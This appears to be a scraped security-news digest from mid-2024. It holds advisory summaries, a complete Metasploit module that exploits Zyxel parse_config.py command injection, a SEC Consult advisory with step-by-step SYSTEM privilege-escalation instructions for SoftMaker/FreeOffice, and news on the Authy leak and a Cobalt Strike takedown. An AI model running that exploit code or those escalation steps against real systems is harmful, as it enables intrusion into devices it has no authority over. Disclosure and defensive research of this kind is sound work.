rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).

**rejetto HFS vulnerable to OS Command Execution by remote authenticated users**

Critical severity GitHub Reviewed Published Jul 5, 2024 to the GitHub Advisory Database • Updated Jul 8, 2024

GHSA-5f4x-hwv2-w9w2: rejetto HFS vulnerable to OS Command Execution by remote authenticated users

Gogs through 0.13.0 allows argument injection during the tagging of a new release. This vulnerability is still unfixed as of the time of this advisory being published.

**Gogs allows argument injection during the tagging of a new release**

High severity GitHub Reviewed Published Jul 4, 2024 to the GitHub Advisory Database • Updated Jul 5, 2024

GHSA-8mm6-wmpp-mmm3: Gogs allows argument injection during the tagging of a new release

Gogs through 0.13.0 allows argument injection during the previewing of changes.

**Gogs allows argument injection during the previewing of changes**

Critical severity GitHub Reviewed Published Jul 4, 2024 to the GitHub Advisory Database • Updated Jul 5, 2024

GHSA-hf29-9hfh-w63j: Gogs allows argument injection during the previewing of changes

Gogs through 0.13.0 allows deletion of internal files. 

**Gogs allows deletion of internal files**

Critical severity GitHub Reviewed Published Jul 4, 2024 to the GitHub Advisory Database • Updated Jul 5, 2024

GHSA-2vgj-3pvg-xh4w: Gogs allows deletion of internal files

103 models of Toshiba Multi-Function Printers (MFP) are vulnerable to 40 different vulnerabilities including remote code execution, local privilege escalation, xml injection, and more.

Toshiba Multi-Function Printers 40 Vulnerabilities

This Metasploit module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series. The affected firmware versions depend on the device module, see this module's documentation for more details.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Zyxel parse_config.py Command Injection',        'Description' => %q{          This module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series.          The affected firmware versions depend on the device module, see this module's documentation for more details.          Note this module was unable to be tested against a real Zyxel device and was tested against a mock environment.          If you run into any issues testing this in a real environment we kindly ask you raise an issue in          metasploit's github repository: https://github.com/rapid7/metasploit-framework/issues/new/choose        },        'Author' => [          'SSD Secure Disclosure technical team', # discovery          'jheysel-r7' # Msf module        ],        'References' => [          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/'],          [ 'CVE', '2023-33012']        ],        'License' => MSF_LICENSE,        'Platform' => ['linux', 'unix'],        'Privileged' => true,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [ 'Automatic Target', {}]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2024-01-24',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],          'Reliability' => [ ] # This vulnerability can only be exploited once, more info: https://vulncheck.com/blog/zyxel-cve-2023-33012#you-get-one-shot        }      )    )    register_options(      [        OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),      ]    )  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'ext-js', 'app', 'common', 'zld_product_spec.js')    })    return CheckCode::Unknown('No response from /ext-js/app/common/zld_product_spec.js') if res.nil?    if res.code == 200      product_match = res.body.match(/ZLDSYSPARM_PRODUCT_NAME1="([^"]*)"/)      version_match = res.body.match(/ZLDCONFIG_CLOUD_HELP_VERSION=([\d.]+)/)      if product_match && version_match        product = product_match[1]        version = version_match[1]        if (product.starts_with?('USG') && product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||           (product.starts_with?('USG') && !product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00')) ||           (product.starts_with?('ATP') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||           (product.starts_with?('VPN') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00'))          return CheckCode::Appears("Product: #{product}, Version: #{version}")        else          return CheckCode::Safe("Product: #{product}, Version: #{version}")        end      end    end    CheckCode::Unknown('Version and product info were unable to be determined.')  end  def on_new_session(session)    super    command_output = ''    # Get the most recently created GRE tunnel interface, bring it down then delete it to allow for subsequent module runs.    if session.type.to_s.eql? 'meterpreter'      newest_gre = session.sys.process.execute '/bin/sh', "-c \"ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1\""      print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")      command_output = session.sys.process.execute '/bin/sh', "-c \"ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success\""    elsif session.type.to_s.eql? 'shell'      newest_gre = session.shell_command_token "ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1"      print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")      command_output = session.shell_command_token "ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success"    end    if command_output.include?('success')      print_good('The GRE interface was successfully removed.')    else      print_warning('The module failed to remove the GRE interface created by this exploit. Subsequent module runs will likely fail unless unless it\'s successfully removed')    end  end  def exploit    # Command injection has a 0x14 byte length limit so keep the file name as small as possible.    # The length limit is also why we leverage the arbitrary file write -> write our payload to the .qrs file then execute it with the command injection.    filename = rand_text_alpha(1)    payload_filepath = "#{datastore['WRITABLE_DIR']}/#{filename}.qsr"    command = payload.raw    command += ' '    command += <<~CMD      2>/var/log/ztplog 1>/var/log/ztplog      (sleep 10 && /bin/rm -rf #{payload_filepath}) &    CMD    command = "echo #{Rex::Text.encode_base64(command)} | base64 -d > #{payload_filepath} ; . #{payload_filepath}"    file_write_pload = "option proto vti\n"    file_write_pload += "option #{command};exit\n"    file_write_pload += "option name 1\n"    config = Base64.strict_encode64(file_write_pload)    data = { 'config' => config, 'fqdn' => "\x00" }    print_status('Attempting to upload the payload via QSR file write...')    file_write_res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),      'data' => data.to_s    })    unless file_write_res && !file_write_res.body.include?('ParseError: 0xC0DE0005')      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')    end    register_files_for_cleanup(payload_filepath)    print_good("File write was successful, uploaded: #{payload_filepath}")    cmd_injection_pload = "option proto gre\n"    cmd_injection_pload += "option name 0\n"    cmd_injection_pload += "option ipaddr ;. #{payload_filepath};\n"    cmd_injection_pload += "option netmask 24\n"    cmd_injection_pload += "option gateway 0\n"    cmd_injection_pload += "option localip #{Faker::Internet.private_ip_v4_address}\n"    cmd_injection_pload += "option remoteip #{Faker::Internet.private_ip_v4_address}\n"    config = Rex::Text.encode_base64(cmd_injection_pload)    data = { 'config' => config, 'fqdn' => "\x00" }    cmd_injection_res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),      'data' => data.to_s    })    # If the payload being used is for example cmd/unix/generic and not a payload spawning any kind of handler (bind or reverse)    # we can query the /ztp/cgi-bin/dumpztplog.py for the stdout of the command and print it for the user.    if payload_instance.connection_type == 'none'      cmd_output_res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py')      })      if cmd_output_res&.body && !cmd_output_res.body.empty?        output = cmd_output_res.body.split("</head>\n<body>")[1]        output = output.split("</body>\n</html>")[0]        output = output.gsub("\n\n<br>", '')        output = output.gsub("[IPC]IPC result: 1\n", '')        print_good("Command output: #{output}")      else        print_error("Could not retrieve the command's stout from /ztp/cgi-bin/dumpztplog.py")      end    end    unless cmd_injection_res && !cmd_injection_res.body.include?('ParseError: 0xC0DE0005')      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')    end  endend

Zyxel parse_config.py Command Injection

308 different models of Sharp Multi-Function Printers (MFP) are vulnerable to 18 different vulnerabilities including remote code execution, local file inclusion, credential disclosure, and more.

Sharp Multi-Function Printer 18 Vulnerabilities

SoftMaker Office and FreeOffice suffer from a local privilege escalation vulnerability via the MSI installer. Vulnerable versions include SoftMaker Office 2024 / NX before revision 1214, FreeOffice 2021 Revision 1068, and FreeOffice 2024 before revision 1215.

SEC Consult Vulnerability Lab Security Advisory < 20240627-0 >  
=======================================================================  
               title: Local Privilege Escalation via MSI installer  
             product: SoftMaker Office / FreeOffice  
  vulnerable version: SoftMaker Office 2024 / NX before revision 1214  
                      FreeOffice 2021 Revision 1068  
                      FreeOffice 2024 before revision 1215  
       fixed version: SoftMaker Office 2024 / NX - revision 1214  
                      FreeOffice 2024 - revision 1215  
          CVE number: CVE-2023-7270  
              impact: high  
            homepage: https://www.softmaker.com/en/  
               found: 2023-11-27  
                  by: Michael Baer (Office Fürth)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"SoftMaker Office makes working with documents, spreadsheets and presentations  
a breeze – whether you're on Windows, Linux, Mac, iOS or Android."

Source: https://www.softmaker.com/en/products/softmaker-office

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Local Privilege Escalation via MSI installer (CVE-2023-7270)  
The SoftMaker Office and FreeOffice MSI installer files were found to produce  
a visible conhost.exe window running as the SYSTEM user when using the repair  
function of msiexec.exe.

This allows a local, low-privileged attacker to use a chain of actions,  
to open a fully functional cmd.exe with the privileges of the SYSTEM user.

Note:  
This attack does not work using a recent version of the Edge Browser or  
Internet Explorer. A different browser, such as Chrome or Firefox, needs to be  
used. Also make sure, that Edge or IE have not been set as default browser  
and that Firefox or Chrome are not running before attempting to exploit it.  
Otherwise, the spawned process would be running with your own permissions and  
the installer will just add a new tab to the browser, instead of spawning a  
new process with SYSTEM.

Proof of concept:  
-----------------  
1) Local Privilege Escalation via MSI installer (CVE-2023-7270)  
For the exploit to work, SoftMaker Office or FreeOffice have to be installed  
via the MSI file. Afterwards, any low-privileged user can start the  
repair of the software by double-clicking the installer and trigger  
the vulnerable actions without a UAC popup. The installer, if deleted from it's  
original location, can be found in C:\Windows\Installer with a randomized name.

During the repair process, a console application gets called with SYSTEM  
privileges and performs a read action on some files.

SoftMaker Office: Executes 7z.exe, which reads  
C:\Program Files\SoftMaker Office 2024\tb\7z.exe

FreeOffice: Executes syspin.exe, which reads  
C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll

This can be used by an attacker by simply setting an oplock on the files  
mentioned before.

As soon as it gets read, the process is blocked until the lock is released.

To do that, one can use the 'SetOpLock.exe' tool from  
"https://github.com/googleprojectzero/symboliclink-testing-tools"  
with the following parameters:

while ($true) { SetOpLock.exe "C:\Program Files\SoftMaker Office 2024\tb\7z.exe" x }  
while ($true) { SetOpLock.exe "C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll" x }

See figure 1 [soft_lock.png] and figure 2 [lock.png]

During the repair process, the locked file is accessed multiple times. The lock  
has to be released by pressing ENTER several times before the window opens.

If the window appears, the lock should not be released to keep the  
window open. The window that gets opened when the console program is  
executed doesn't close and can then be interacted with.

Note 1: The syspin.exe window is minimized. When the lock is triggered, it  
is advised to check the taskbar whether a window with a blue arrow,  
see figure 7 [taskbar.png], exists.

The attacker can then perform the following actions to spawn a SYSTEM shell:  
- Right click on the top bar of the window  
- Click on properties, see figure 3 [soft_openbrowser.png] and figure 4 [openbrowser.png]  
- Under options, click on the "new console features" link  
- Open the link with e.g. firefox  
- In the opened browser window press the key combination CTRL+o  
- Type cmd.exe in the top bar and press Enter, see figure 5 [soft_cmd.png] and figure 6 [cmd.png]

Note 2: This does not work using a recent version of the Edge Browser.

Note 3: The program syspin.exe is invoked several times, sometimes without  
elevated privileges. If the final cmd.exe is not elevated, release the lock  
and wait for the next syspin.exe invocation. During our test, the fifth  
window was run with elevated privileges.

Vulnerable / tested versions:  
-----------------------------  
The following versions have been tested by SEC Consult which were the most recent  
versions available at the time of the test:  
* SoftMaker Office 2024 - 24.0.6034  
* FreeOffice 2021 Revision 1068

According to the vendor, all versions of SoftMaker Office NX/2024 before revision 1214  
and FreeOffice 2024 before revision 1215 with the MSI installer are affected.

FreeOffice 2021 is unsupported and will not be fixed according to the vendor.

Vendor contact timeline:  
------------------------  
2023-12-02: Contacting vendor through sales@softmaker.de,  
             asking for security contact.  
2023-12-07: Contacting vendor through https://www.softmaker.com/en/support/customer-support  
             asking for security contact.  
2024-01-11: Contacting vendor through https://www.softmaker.com/en/support/customer-support  
             asking for security contact.  
2024-01-11: Vendor provides security contact and asks for advisory  
             unencrypted  
2024-01-12: Sending advisory draft unencrypted to security contact  
2024-02-17: Asking for status of vulnerability, no response  
2024-03-06: Asking for status of vulnerability, no response  
2024-04-08: Asking for a status update, setting release date to  
             17th April.  
2024-04-08: Vendor response, seems not to have received our previous mails.  
             Asking for deadline extension as a release it already planned.  
2024-04-09: Sending advisory draft again, extending deadline.  
2024-04-11: Asking whether email was received, confirmed. Sent proposed  
             solution.  
2024-04-22: Asking when new release is planned and whether fixes could be  
             incorporated.  
2024-04-23: Vendor response, current service pack update not including fixes,  
             planned in about 6 weeks.  
2024-05-27: Vendor response, service pack / revision 1214 was published which fixes  
             the issue for Office 2024 and Office NX. FreeOffice 2024 will  
             be fixed in the next release mid June. FreeOffice 2021 is unsupported.  
2024-06-11: Vendor: FreeOffice 2024 will be patched on 18th June, asks for advisory  
             release to be postponed a bit.  
2024-06-17: Setting advisory release date for 27th June, reserving CVE.  
2024-06-18: Vendor releases FreeOffice 2024 revision 1215.  
2024-06-27: Release of security advisory.

Solution:  
---------  
The vendor provides a service pack version 1214 for SoftMaker Office 2024 and  
SofMaker Office NX, which can be downloaded from:  
https://softmaker.de/download/servicepacks

FreeOffice 2024 revision 1215:  
https://www.freeoffice.com/de/download/servicepacks

FreeOffice 2021 is unsupported and will not be fixed according to the vendor.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Michael Baer / 2024

SoftMaker Office / FreeOffice Local Privilege Escalation

Authy users have been warned that their phone numbers have been obtained by cybercriminals that abused an unsecured API endpoint.

Twilio has warned users of the Authy multi-factor authentication (MFA) app about an incident in which cybercriminals may have obtained their phone numbers.

Twilio said the cybercriminals abused an unsecured Application Programming Interface (API) endpoint to verify the phone numbers of millions of Authy multi-factor authentication users.

Authy is an app that you install on your device which then produces a MFA code for you when logging into services.

The cybercriminals were able test the validity of an enormous list of phone numbers against the unsecured API endpoint. If the number was valid, the endpoint would return information about the associated accounts registered with Authy.

Twilio says it has seen no evidence of the attackers gaining access to Twilio’s systems or other sensitive data, but as a precaution it is asking all Authy users to update to the latest Android and iOS apps.

BleepingComputer notes that a threat actor named ShinyHunters leaked a CSV text file containing what they claim are 33 million phone numbers registered with the Authy service.

> “In late June, a threat actor named ShinyHunters leaked a CSV text file containing what they claim are 33 million phone numbers registered with the Authy service.”

In that post, ShinyHunters suggests that buyers combine the data set with those leaked in the Gemini or Nexo data breaches. Nexo is a crypto platform where users can buy, exchange, and store Bitcoin and other cryptocurrencies. Gemini is another cryptocurrency exchange which has suffered several breaches in the past years.

With matches between the data sets, a cybercriminal could engage in SIM-swapping or phishing attacks to steal the target’s cryptocurrencies.

If you are an Authy user we advise you to update at your earliest convenience and keep an eye out for any potential phishing messages.

**How to avoid being phished**

Remember that phishing messages will try to rush you into making a decision by setting an ultimatum or otherwise imposing a sense of urgency. Don’t let them rush you into an expensive mistake.

There are a few tell-tale signs for phishing mails:

1.  It asks you to update/fill in personal information.
2.  The URL on the email and the URL that displays when you hover over the link are different from one another.
3.  The “From” address is not the legitimate address, although it may be a close imitation.
4.  The formatting and design are different from what you usually receive from the impersonated brand.
5.  The email contains an attachment you weren’t expecting.

However, with the advancement of AI, phishing emails are getting more sophisticated. So if you have even a tiny amount of suspicion that something is phishy, don’t hesitate to confirm the source of the email through another method. The chances of losing your money are much smaller after a quick call asking “Did you send this?”

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Authy phone numbers accessed by cybercriminals, warns Twilio 

A coordinated law enforcement operation codenamed MORPHEUS has felled close to 600 servers that were used by cybercriminal groups and were part of an attack infrastructure associated with the Cobalt Strike. 
The crackdown targeted older, unlicensed versions of the Cobalt Strike red teaming framework between June 24 and 28, according to Europol.
Of the 690 IP addresses that were flagged to

A coordinated law enforcement operation codenamed MORPHEUS has felled close to 600 servers that were used by cybercriminal groups and were part of an attack infrastructure associated with the Cobalt Strike.

The crackdown targeted older, unlicensed versions of the Cobalt Strike red teaming framework between June 24 and 28, according to Europol.

Of the 690 IP addresses that were flagged to online service providers in 27 countries as associated with criminal activity, 590 are no longer accessible.

The joint operation, which commenced in 2021, was led by the U.K. National Crime Agency (NCA) and involved authorities from Australia, Canada, Germany, the Netherlands, Poland and the U.S. Officials from Bulgaria, Estonia, Finland, Lithuania, Japan, and South Korea provided additional support.

Cobalt Strike is a popular adversary simulation and penetration testing tool developed by Fortra (formerly Help Systems), offering IT security experts a way to identify weaknesses in security operations and incident responses.

However, as previously observed by Google and Microsoft, cracked versions of the software have found their way into the hands of malicious actors, who have time-and-again abused it for post-exploitation purposes.

According to a recent report from Palo Alto Networks Unit 42, this involves the use of a payload called Beacon, which uses text-based profiles called Malleable C2 to alter the characteristics of Beacon's web traffic in an attempt to avoid detection.

"Although Cobalt Strike is a legitimate piece of software, sadly cybercriminals have exploited its use for nefarious purposes," Paul Foster, director of threat leadership at the NCA, said in a statement.

"Illegal versions of it have helped lower the barrier of entry into cybercrime, making it easier for online criminals to unleash damaging ransomware and malware attacks with little or no technical expertise. Such attacks can cost companies millions in terms of losses and recovery."

The development comes as Spanish and Portuguese law enforcement have arrested 54 people for committing crimes against elderly citizens through vishing schemes by posing as bank employees and tricking them into parting with personal information under the guise of rectifying a problem with their accounts.

The details were then passed on to other members of the criminal network, who would visit the victims' homes unannounced and pressure them into giving away their credit cards, PIN codes, and bank details. Some instances also involved the theft of cash and jewelry.

The criminal scheme ultimately enabled the miscreants to take control of the targets' bank accounts or make unauthorized cash withdrawals from ATMs and other expensive purchases.

"Using a blend of fraudulent phone calls and social engineering, the criminals are responsible for €2,500,000 in losses," Europol said earlier this week.

"The funds were deposited into multiple Spanish and Portuguese accounts controlled by the fraudsters, from where they were funneled into an elaborate money laundering scheme. An extensive network of money mules overseen by specialist members of the organization was used to disguise the origin of the illicit funds."

The arrests also follow similar action undertaken by INTERPOL to dismantle human trafficking rings in several countries, including Laos, where several Vietnamese nationals were lured with promises of high-paying jobs, only to be coerced into creating fraudulent online accounts for financial scams.

"Victims worked 12-hour workdays, extended to 14 hours if they failed to recruit others, and had their documents confiscated," the agency said. "Families were extorted up to USD $10,000 to secure their return to Vietnam."

Last week, INTERPOL said it also seized $257 million worth of assets and froze 6,745 bank accounts following a global police operation spanning 61 countries that was conducted to disrupt online scam and organized crime networks.

The exercise, referred to as Operation First Light, targeted phishing, investment fraud, fake online shopping sites, romance, and impersonation scams. It led to the arrest of 3,950 suspects and identified 14,643 other possible suspects in all continents.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#git